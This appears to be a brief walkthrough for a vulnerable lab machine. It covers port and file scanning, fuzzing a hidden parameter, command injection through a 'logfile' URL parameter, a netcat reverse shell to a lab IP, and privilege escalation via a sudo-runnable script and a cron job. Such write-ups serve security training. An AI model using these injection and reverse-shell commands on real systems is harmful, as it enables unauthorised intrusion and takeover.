Machines can be download here.
Nmap scan ports.
Gobuster scan files and folders.
Visit main page, get chat window.
Visit chat.txt, chat history is here.
Visit administration.php, get error.
There should be some parameter for administration.php.
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt 'http://192.168.56.56:8080/administration.php?FUZZ=test'
Exclude 65ch length response.
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hh 65 'http://192.168.56.56:8080/administration.php?FUZZ=test'
curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;id
Check chat.txt.
There is RCE. Get reverse shell now.
curl http://192.168.56.56:8080/administration.php\?logfile\=administration.php\;nc%20192.168.56.100%201234%20-e%20/bin/bash
sudo -l
cat /var/www/html/start.sh
echo bash >/var/www/html/start.sh sudo -u julia /bin/bash /var/www/html/start.sh
Check crontab.
Add reverse shell code into check.sh, and wait.